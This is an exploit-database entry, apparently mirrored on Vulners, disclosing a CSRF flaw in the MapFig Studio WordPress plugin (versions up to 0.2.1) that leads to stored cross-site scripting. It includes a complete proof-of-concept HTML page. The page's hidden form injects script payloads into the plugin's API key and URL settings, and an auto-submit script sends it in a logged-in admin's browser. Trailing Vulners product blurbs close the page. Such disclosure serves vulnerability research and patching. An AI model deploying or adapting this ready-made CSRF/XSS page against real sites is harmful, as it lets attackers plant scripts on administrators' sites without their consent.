`# Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF
# Date: 15-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/
# Version: <= 0.2.1
# Tested on: Firefox
# Contact me: [email protected]
Description
The plugin does not have CSRF check in some places, and is missing
sanitisation as well as escaping, which could allow attackers to make
logged in admin add Stored XSS payloads via a CSRF attack
Proof of Concept
Have a logged in admin open a page containing:
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=studio_settings"
method="POST">
<input type="hidden" name="studio_apikey"
value=""><script>alert(1)</script>" />
<input type="hidden" name="studio_url"
value=""><script>alert(1)</script>" />
<input type="hidden" name="save" value="Save!" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference:
https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation